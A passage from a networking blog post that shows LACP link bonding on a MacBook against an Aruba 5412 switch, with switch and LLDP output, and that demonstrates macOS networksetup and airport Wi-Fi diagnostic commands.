options<span style="color: #555555;">=</span><span style="color: #ff6600;">6467</span><span style="color: #555555;"><</span>RXCSUM,TXCSUM,VLAN_MTU,TSO4,TSO6,CHANNEL_IO,PARTIAL_CSUM,ZEROINVERT_CSUM<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:<span style="color: #ff6600;">0</span>d
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
media: autoselect (<span style="color: #ff6600;">1000</span>baseT <span style="color: #555555;"><</span>full<span style="color: #555555;">-</span>duplex<span style="color: #555555;">></span>)
status: active
en9: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8963</span><span style="color: #555555;"><</span>UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
options<span style="color: #555555;">=</span><span style="color: #ff6600;">6467</span><span style="color: #555555;"><</span>RXCSUM,TXCSUM,VLAN_MTU,TSO4,TSO6,CHANNEL_IO,PARTIAL_CSUM,ZEROINVERT_CSUM<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
media: autoselect (<span style="color: #ff6600;">1000</span>baseT <span style="color: #555555;"><</span>full<span style="color: #555555;">-</span>duplex<span style="color: #555555;">></span>)
status: active
bond0: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8943</span><span style="color: #555555;"><</span>UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
options<span style="color: #555555;">=</span><span style="color: #ff6600;">6067</span><span style="color: #555555;"><</span>RXCSUM,TXCSUM,VLAN_MTU,TSO4,TSO6,PARTIAL_CSUM,ZEROINVERT_CSUM<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab
inet6 fe80::<span style="color: #ff6600;">4</span>b6:<span style="color: #ff6600;">645</span>c:b6da:<span style="color: #ff6600;">611</span>f<span style="color: #555555;">%</span>bond0 prefixlen <span style="color: #ff6600;">64</span> secured scopeid <span style="color: #ff6600;">0x19</span>
inet <span style="color: #ff6600;">10.112.254.20</span> netmask <span style="color: #ff6600;">0xffff0000</span> broadcast <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.255</span>
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
media: autoselect (<span style="color: #ff6600;">1000</span>baseT <span style="color: #555555;"><</span>full<span style="color: #555555;">-</span>duplex<span style="color: #555555;">></span>)
status: active
bond interfaces: en9 en6
</pre></div>
</div><div><br /></div><div>I included en0, my wifi interface, for a reason. Look at the Ethernet address of en0. A "show lacp peer" lists en0's MAC as the "System ID" of the MacBook. I disabled wifi and disconnected/reconnected the Ethernet cables but the Aruba 5412r still showed the en0 MAC as the system ID. </div><div><br /></div><div><br /></div><div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #ff6600;">AHS-5412</span><span style="color: #555555;">-</span>MDF<span style="color: #0099ff; font-style: italic;"># sh lacp peer</span>
LACP Peer Information<span style="color: #555555;">.</span>
System ID: <span style="color: #ff6600;">883</span>a30<span style="color: #555555;">-</span><span style="color: #ff6600;">768</span>a00
Local Local Port Oper LACP Tx
Port Trunk System ID Port Priority Key Mode Timer
<span style="color: #555555;">------</span> <span style="color: #555555;">------</span> <span style="color: #555555;">-----------------</span> <span style="color: #555555;">-----</span> <span style="color: #555555;">---------</span> <span style="color: #555555;">-------</span> <span style="color: #555555;">--------</span> <span style="color: #555555;">-----</span>
A8 Trk1 <span style="color: #ff6600;">50</span>ed3c<span style="color: #555555;">-</span><span style="color: #ff6600;">22</span>be32 <span style="color: #ff6600;">8</span> <span style="color: #ff6600;">32768</span> <span style="color: #ff6600;">1</span> Active Slow
B8 Trk1 <span style="color: #ff6600;">50</span>ed3c<span style="color: #555555;">-</span><span style="color: #ff6600;">22</span>be32 <span style="color: #ff6600;">22</span> <span style="color: #ff6600;">32768</span> <span style="color: #ff6600;">1</span> Active Slow
</pre></div>
</div><div><br /></div><div><br /></div><div>But, doing a show mac-address trk1 lists the MAC addresses of interfaces en6/en9.</div><div><br /></div><div><br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">AHS<span style="color: #555555;">-</span><span style="color: #ff6600;">5412</span><span style="color: #555555;">-</span>MDF<span style="color: #0099ff; font-style: italic;"># sh mac-address trk1</span>
Status <span style="color: black; font-weight: bold;">and</span> Counters <span style="color: #555555;">-</span> Port Address Table <span style="color: #555555;">-</span> Trk1
MAC Address VLANs
<span style="color: #555555;">-----------------</span> <span style="color: #555555;">------------</span>
<span style="color: #ff6600;">00</span>e04c<span style="color: #555555;">-</span><span style="color: #ff6600;">680</span>a0d <span style="color: #ff6600;">254</span>
<span style="color: #ff6600;">00</span>e04c<span style="color: #555555;">-</span><span style="color: #ff6600;">680</span>aab <span style="color: #ff6600;">254</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Here is the configuration of the trunk and Vlan 254 on the Aruba 5412r switch.</div><div><br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">trunk A8,B8 trk1 lacp
show run vl <span style="color: #ff6600;">254</span>
Running configuration:
Vlan <span style="color: #ff6600;">254</span>
name <span style="color: #cc3300;">"Device Management"</span>
untagged Trk1
ip address <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.254</span> <span style="color: #ff6600;">255.255</span><span style="color: #555555;">.</span><span style="color: #ff6600;">255.0</span>
<span style="color: #336666;">exit</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>I haven't covered installing the lldpd software yet, which will be in part 5, but here is what the lldp neighbor looks like on the MacBook:</div><div><br /></div><div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">[lldpcli] <span style="color: #0099ff; font-style: italic;"># sh ne</span>
<span style="color: #555555;">-------------------------------------------------------------------------------</span>
LLDP neighbors:
<span style="color: #555555;">-------------------------------------------------------------------------------</span>
Interface: en6, via: LLDP, RID: <span style="color: #ff6600;">4</span>, Time: <span style="color: #ff6600;">0</span> day, <span style="color: #ff6600;">00</span>:<span style="color: #ff6600;">44</span>:<span style="color: #ff6600;">53</span>
Chassis:
ChassisID: mac <span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">3</span>a:<span style="color: #ff6600;">30</span>:<span style="color: #ff6600;">76</span>:<span style="color: #ff6600;">8</span>a:<span style="color: #ff6600;">00</span>
SysName: AHS<span style="color: #555555;">-</span><span style="color: #ff6600;">5412</span><span style="color: #555555;">-</span>MDF
SysDescr: HP J9851A Switch <span style="color: #ff6600;">5412</span>Rzl2, revision KB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0012</span>, ROM KB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.01</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0009</span> (<span style="color: #555555;">/</span>ws<span style="color: #555555;">/</span>swbuildm<span style="color: #555555;">/</span>rel_ajanta_qaoff<span style="color: #555555;">/</span>code<span style="color: #555555;">/</span>build<span style="color: #555555;">/</span>bom(swbuildm_rel_ajanta_qaoff_rel_ajanta))
MgmtIP: <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.254</span>
Capability: Bridge, on
Capability: Router, on
Port:
PortID: local <span style="color: #ff6600;">8</span>
PortDescr: A8
TTL: <span style="color: #ff6600;">120</span>
Unknown TLVs:
TLV: OUI: <span style="color: #ff6600;">00</span>,<span style="color: #ff6600;">16</span>,B9, SubType: <span style="color: #ff6600;">2</span>, Len: <span style="color: #ff6600;">2</span> <span style="color: #ff6600;">00</span>,<span style="color: #ff6600;">01</span>
<span style="color: #555555;">-------------------------------------------------------------------------------</span>
Interface: en9, via: LLDP, RID: <span style="color: #ff6600;">4</span>, Time: <span style="color: #ff6600;">0</span> day, <span style="color: #ff6600;">00</span>:<span style="color: #ff6600;">45</span>:<span style="color: #ff6600;">00</span>
Chassis:
ChassisID: mac <span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">3</span>a:<span style="color: #ff6600;">30</span>:<span style="color: #ff6600;">76</span>:<span style="color: #ff6600;">8</span>a:<span style="color: #ff6600;">00</span>
SysName: AHS<span style="color: #555555;">-</span><span style="color: #ff6600;">5412</span><span style="color: #555555;">-</span>MDF
SysDescr: HP J9851A Switch <span style="color: #ff6600;">5412</span>Rzl2, revision KB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0012</span>, ROM KB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.01</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0009</span> (<span style="color: #555555;">/</span>ws<span style="color: #555555;">/</span>swbuildm<span style="color: #555555;">/</span>rel_ajanta_qaoff<span style="color: #555555;">/</span>code<span style="color: #555555;">/</span>build<span style="color: #555555;">/</span>bom(swbuildm_rel_ajanta_qaoff_rel_ajanta))
MgmtIP: <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.254</span>
Capability: Bridge, on
Capability: Router, on
Port:
PortID: local <span style="color: #ff6600;">40</span>
PortDescr: B8
TTL: <span style="color: #ff6600;">120</span>
Unknown TLVs:
TLV: OUI: <span style="color: #ff6600;">00</span>,<span style="color: #ff6600;">16</span>,B9, SubType: <span style="color: #ff6600;">2</span>, Len: <span style="color: #ff6600;">2</span> <span style="color: #ff6600;">00</span>,<span style="color: #ff6600;">01</span>
<span style="color: #555555;">-------------------------------------------------------------------------------</span>
[lldpcli] <span style="color: #0099ff; font-style: italic;">#</span>
</pre></div>
<p><br /></p><p>As expected, it shows both interfaces, A8/B8, on the 5412. </p><p><br /></p><p>Finally, to show that it worked here is a ping to an access point connected to another switch:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ping <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>
PING <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span> (<span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>): <span style="color: #ff6600;">56</span> data <span style="color: #336666;">bytes</span>
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">0</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">5.203</span> ms
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">1</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.693</span> ms
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">2</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.613</span> ms
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">3</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.752</span> ms
<span style="color: #555555;">^</span>C
<span style="color: #555555;">---</span> <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254.155</span> ping statistics <span style="color: #555555;">---</span>
<span style="color: #ff6600;">4</span> packets transmitted, <span style="color: #ff6600;">4</span> packets received, <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> packet loss
<span style="color: #336666;">round</span><span style="color: #555555;">-</span>trip <span style="color: #336666;">min</span><span style="color: #555555;">/</span>avg<span style="color: #555555;">/</span><span style="color: #336666;">max</span><span style="color: #555555;">/</span>stddev <span style="color: #555555;">=</span> <span style="color: #ff6600;">1.613</span><span style="color: #555555;">/</span><span style="color: #ff6600;">2.565</span><span style="color: #555555;">/</span><span style="color: #ff6600;">5.203</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1.524</span> ms
</pre></div>
<p><br /></p><h4 style="text-align: left;">Wireshark</h4><p>I opened Wireshark and Bond0 appeared in the capture interface dialog. While capturing, this was the title:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivftNVO-IrWpalSV5ryN6qKHlCfLnqDtfvlI94j-DL3Nbqgqx6FR1QJlBI_KZfBEPZ_bZ5eLDtth6nbCj77sQkHcSbNUbsewOCd6Olj-vOHBpTi42UQU7mmVmkVMKxhCDNBfU6cAm_1AoN/s274/Screen+Shot+2021-04-19+at+19.47.41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="77" data-original-width="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivftNVO-IrWpalSV5ryN6qKHlCfLnqDtfvlI94j-DL3Nbqgqx6FR1QJlBI_KZfBEPZ_bZ5eLDtth6nbCj77sQkHcSbNUbsewOCd6Olj-vOHBpTi42UQU7mmVmkVMKxhCDNBfU6cAm_1AoN/s0/Screen+Shot+2021-04-19+at+19.47.41.png" /></a></div><p><br /></p><h3 id="networksetup" style="text-align: left;">Listing everything about the Network!</h3><p>macOS includes a utility called "networksetup". It has over 100 options! I can't cover all of them here. To see a complete list:<br /></p><ul style="text-align: left;"><li>Open a terminal</li><li>enter networksetup 1</li></ul><p></p><p>The 1 is an invalid option and networksetup will dump every option out as a list. You can also enter networksetup with no options and it will dump a help screen.</p><p><br /></p><h4 style="text-align: left;">Getting Started with networksetup</h4><p>List all network hardware:</p><p><b>networksetup -listallhardwareports</b></p><p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 240, 240); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #06287e;">networksetup -listallhardwareports [22</span><span style="color: #666666;">:</span><span style="color: #40a070;">11:57]</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Ethernet Adaptor (en3)</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en3</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">1e:00:f2:0a:c4:65</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Ethernet Adaptor (en4)</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en4</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">1e:00:f2:0a:c4:66</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Wi-Fi</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en0</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">50:ed:3c:22:be:32</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Bluetooth PAN</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en13</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">50:ed:3c:2c:91:ac</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Thunderbolt 1</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en1</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">36:5f:f4:a6:93:80</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Thunderbolt 2</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en2</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">36:5f:f4:a6:93:84</span>
<span style="color: #06287e;">Hardware Port</span><span style="color: #666666;">:</span> <span style="color: #40a070;">Thunderbolt Bridge</span>
<span style="color: #06287e;">Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">bridge0</span>
<span style="color: #06287e;">Ethernet Address</span><span style="color: #666666;">:</span> <span style="color: #40a070;">36:5f:f4:a6:93:80</span>
<span style="border: 1px solid rgb(255, 0, 0);">VLAN</span> <span style="color: #bb60d5;">Configurations</span>
<span style="color: #666666;">===================</span>
<span style="color: #06287e;">VLAN User Defined Name</span><span style="color: #666666;">:</span> <span style="color: #40a070;">VLAN-254</span>
<span style="color: #06287e;">Parent Device</span><span style="color: #666666;">:</span> <span style="color: #40a070;">en9</span>
<span style="color: #06287e;">Device ("Hardware" Port)</span><span style="color: #666666;">:</span> <span style="color: #40a070;">vlan0</span>
<span style="color: #06287e;">Tag</span><span style="color: #666666;">:</span> <span style="color: #40a070;">254</span>
</pre></div>
<p><br /></p><p>You can use the </p><p><b>networksetup -listallnetworkservices</b></p><p>command to list all network services on your Mac. On my M1 I have connected several different USB Ethernet adapters over time and created a Vlan interface. Here are what my services look like:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">networksetup <span style="color: #555555;">-</span>listallnetworkservices
An asterisk (<span style="color: #555555;">*</span>) denotes that a network service <span style="color: black; font-weight: bold;">is</span> disabled<span style="color: #555555;">.</span>
Wi<span style="color: #555555;">-</span>Fi
iPhone USB
USB <span style="color: #ff6600;">10</span><span style="color: #555555;">/</span><span style="color: #ff6600;">100</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1000</span> LAN <span style="color: #ff6600;">3</span>
USB <span style="color: #ff6600;">10</span><span style="color: #555555;">/</span><span style="color: #ff6600;">100</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1000</span> LAN
StarTech USBA2DPGB
USB <span style="color: #ff6600;">10</span><span style="color: #555555;">/</span><span style="color: #ff6600;">100</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1000</span> LAN <span style="color: #ff6600;">2</span>
Bluetooth PAN <span style="color: #ff6600;">2</span>
Thunderbolt Ethernet Slot <span style="color: #ff6600;">1</span>
Thunderbolt Bridge
VLAN<span style="color: #555555;">-</span><span style="color: #ff6600;">254</span>
VPN (L2TP)
</pre></div>
<p><br /></p><p>Now that you have a list of services, you can get information about them. In this case, my current wifi settings:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">networksetup <span style="color: #555555;">-</span>getinfo Wi<span style="color: #555555;">-</span>Fi [<span style="color: #ff6600;">18</span>:<span style="color: #ff6600;">16</span>:<span style="color: #ff6600;">18</span>]
DHCP Configuration
IP address: <span style="color: #ff6600;">10.0</span><span style="color: #555555;">.</span><span style="color: #ff6600;">23.119</span>
Subnet mask: <span style="color: #ff6600;">255.255</span><span style="color: #555555;">.</span><span style="color: #ff6600;">252.0</span>
Router: <span style="color: #ff6600;">10.0</span><span style="color: #555555;">.</span><span style="color: #ff6600;">20.1</span>
Client ID:
IPv6 IP address: none
IPv6 Router: none
Wi<span style="color: #555555;">-</span>Fi ID: <span style="color: #ff6600;">50</span>:ed:<span style="color: #ff6600;">3</span>c:<span style="color: #ff6600;">22</span>:be:<span style="color: #ff6600;">32</span>
</pre></div>
<p><br /></p><h4 style="text-align: left;">List all the SSIDs that you have connected to:</h4><p>networksetup -listpreferredwirelessnetworks en0</p><p><br /></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 240, 240); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #06287e;">networksetup -listpreferredwirelessnetworks en0 [22</span><span style="color: #666666;">:</span><span style="color: #40a070;">18:52]</span>
<span style="color: #06287e;">Preferred networks on en0</span><span style="color: #666666;">:</span>
The Paddock
JCI_Guest WIFI
Troys iPhone
VOE2
LAE GUEST
CHE Guest
VectorUSA Guest
MPH Guest
888-Secure
888-Guest
PD-Guest
AirConsole-28
AirConsole-D8
Piconsole-02
Employee
RIV-guest
</pre></div>
<p><br /></p><p><br /></p><h4 style="text-align: left;">List Vlans that have been created:</h4><p>networksetup -listVLANs</p><p>In this example, I have created vlan 254 using USB adapter en9<br /><br />
<!--HTML generated using hilite.me--></p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">networksetup -listVLANs <span style="color: #555555;">[</span>21:33:59<span style="color: #555555;">]</span>
VLAN User Defined Name: VLAN-254
Parent Device: en9
Device <span style="color: #555555;">(</span><span style="color: #cc3300;">"Hardware"</span> Port<span style="color: #555555;">)</span>: vlan0
Tag: 254
</pre></div>
<br /><p><br /></p><h4 id="airport" style="text-align: left;">The Airport Utility</h4><p>One thing that every network engineer needs, especially a wireless network engineer, is information about the current Wi-Fi connection and the SSIDs in the area. macOS makes it easy to get this information.</p><p>You can hold down the ⌥ key and click on the Wi-Fi icon in the menu bar to get details on the current Wi-Fi connection. This brings up additional information compared to just clicking on the Wi-Fi icon. I don't know why Apple doesn't make this the default. Anyway, here is what the additional menu looks like:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnfCfWZRY6eXGP2RJVmmvEg32yd_Nak57Inu4hlh4SPKTlfDkfbKUNQSoyjiC5eB8hi3ibtpCaKZE-rnZNYy7aLW761hk1jJe-aqLhjkgqcgg3iBFhZNlrz_n35O7PWRcQfL_6CDGJwZt5/s664/Screen+Shot+2021-11-28+at+21.39.12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="596" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnfCfWZRY6eXGP2RJVmmvEg32yd_Nak57Inu4hlh4SPKTlfDkfbKUNQSoyjiC5eB8hi3ibtpCaKZE-rnZNYy7aLW761hk1jJe-aqLhjkgqcgg3iBFhZNlrz_n35O7PWRcQfL_6CDGJwZt5/s320/Screen+Shot+2021-11-28+at+21.39.12.png" width="287" /></a></div><br /><h4 style="text-align: left;">From the terminal</h4><p>Apple includes a utility called "airport" that lists information about the current Wi-Fi connection and other SSIDs in the area. </p><p>But, Apple hid it deep in the operating system. To make it easy to use, create a symbolic link using the following command in the terminal:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 240, 240); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
</pre></div>
<p><br /></p><p>Now you can type "airport" from any directory and the command will work.</p><h4 style="text-align: left;">Display Wi-Fi information</h4>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">airport -I [<span style="color: #ff6600;">21</span>:<span style="color: #ff6600;">35</span>:<span style="color: #ff6600;">56</span>]
agrCtlRSSI: -<span style="color: #ff6600;">52</span>
agrExtRSSI: <span style="color: #ff6600;">0</span>
agrCtlNoise: -<span style="color: #ff6600;">90</span>
agrExtNoise: <span style="color: #ff6600;">0</span>
state: running
op mode: station
lastTxRate: <span style="color: #ff6600;">864</span>
maxRate: <span style="color: #ff6600;">144</span>
lastAssocStatus: <span style="color: #ff6600;">0</span>
<span style="color: #ff6600;">802.11</span> auth: open
link auth: wpa2-psk
BSSID: <span style="color: #ff6600;">9</span>c:<span style="color: #ff6600;">8</span>c:d8:<span style="color: #ff6600;">11</span>:<span style="color: #ff6600;">7</span>a:f0
SSID: test
MCS: <span style="color: #ff6600;">0</span>
channel: <span style="color: #ff6600;">36</span>,<span style="color: #ff6600;">80</span>
</pre></div>
<p><br /></p><h4 style="text-align: left;">Scan the Wi-Fi environment</h4>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">airport -s [<span style="color: #ff6600;">21</span>:<span style="color: #ff6600;">50</span>:<span style="color: #ff6600;">24</span>]
SSID BSSID RSSI CHANNEL HT CC <span style="color: #cc00ff;">SECURITY</span> (auth/unicast/<span style="color: #006699; font-weight: bold;">group</span>)
LinksysJT d8:eb:<span style="color: #ff6600;">97</span>:<span style="color: #ff6600;">33</span>:<span style="color: #ff6600;">01</span>:a8 -<span style="color: #ff6600;">96</span> <span style="color: #ff6600;">6</span> Y US WPA2(PSK/AES/AES)
ORBI72 c2:a5:<span style="color: #ff6600;">11</span>:ac:c0:<span style="color: #ff6600;">22</span> -<span style="color: #ff6600;">94</span> <span style="color: #ff6600;">8</span> Y -- WPA2(PSK/AES/AES)
LinksysJT_guest da:eb:<span style="color: #ff6600;">97</span>:<span style="color: #ff6600;">33</span>:<span style="color: #ff6600;">01</span>:a8 -<span style="color: #ff6600;">94</span> <span style="color: #ff6600;">6</span> Y US WPA2(PSK/AES/AES)
MySpectrumWiFic0-<span style="color: #ff6600;">2</span>G a4:<span style="color: #ff6600;">08</span>:f5:<span style="color: #ff6600;">45</span>:f3:c6 -<span style="color: #ff6600;">93</span> <span style="color: #ff6600;">1</span> Y US WPA2(PSK/AES/AES)
jayzee59 c0:<span style="color: #ff6600;">3</span>c:<span style="color: #ff6600;">04</span>:a9:<span style="color: #ff6600;">89</span>:<span style="color: #ff6600;">49</span> -<span style="color: #ff6600;">92</span> <span style="color: #ff6600;">1</span> Y US WPA2(PSK/AES/AES)
V Family <span style="color: #ff6600;">92</span>:<span style="color: #ff6600;">3</span>b:ad:af:a8:<span style="color: #ff6600;">87</span> -<span style="color: #ff6600;">83</span> <span style="color: #ff6600;">11</span> Y -- WPA2(PSK/AES/AES)
test <span style="color: #ff6600;">38</span>:<span style="color: #ff6600;">17</span>:c3:<span style="color: #ff6600;">12</span>:<span style="color: #ff6600;">0</span>c:<span style="color: #ff6600;">30</span> -<span style="color: #ff6600;">78</span> <span style="color: #ff6600;">52</span> Y -- WPA2(PSK/AES/AES)
